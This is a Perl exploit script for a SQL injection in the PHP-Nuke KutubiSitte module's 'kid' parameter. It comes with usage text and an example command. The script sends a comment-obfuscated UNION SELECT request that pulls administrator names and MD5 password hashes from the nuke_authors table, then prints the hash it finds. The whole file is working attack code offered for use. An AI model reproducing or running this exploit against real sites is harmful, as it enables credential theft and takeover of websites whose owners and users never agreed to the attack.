phpnukekutubisitte-sql.txt

`#!/usr/bin/perl   
use Getopt::Std;  
use LWP::UserAgent;  
  
sub usg{  
printf("  
  
  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-  
| PHP-NUKE KutubiSitte [kid] => SQL Injection |  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-  
#######################################################  
# Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #  
#######################################################  
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->  
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#  
#:-------------------------------------------------------:#  
:#| USAGE: |#:  
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:  
#:-------------------------------------------------------:#  
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#  
#:-------------------------------------------------------:#  
:#| EXAMPLE: |#:  
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:  
#:-------------------------------------------------------:#  
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#  
  
  
");  
}  
sub problem{  
print "\n\n[~] SITO NON VULNERABILE [~]\n\n";  
exit();  
}  
sub exploitation{  
  
$conn = LWP::UserAgent -> new;  
$conn->agent('Checkbot/0.4 ');  
$query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";  
$return_pwd = $conn->get($query_pwd) || problem();  
$return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();  
print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";  
}  
  
getopts(":h:p:U:",\%args);  
$host = $args{h} if (defined $args{h});  
$path = $args{p} if (defined $args{p});  
$user_id= $args{U}if (defined $args{U});  
  
if (!defined $args{h} || !defined $args{p} || !defined $args{U}){  
usg();  
}  
else{  
exploitation();  
}  
`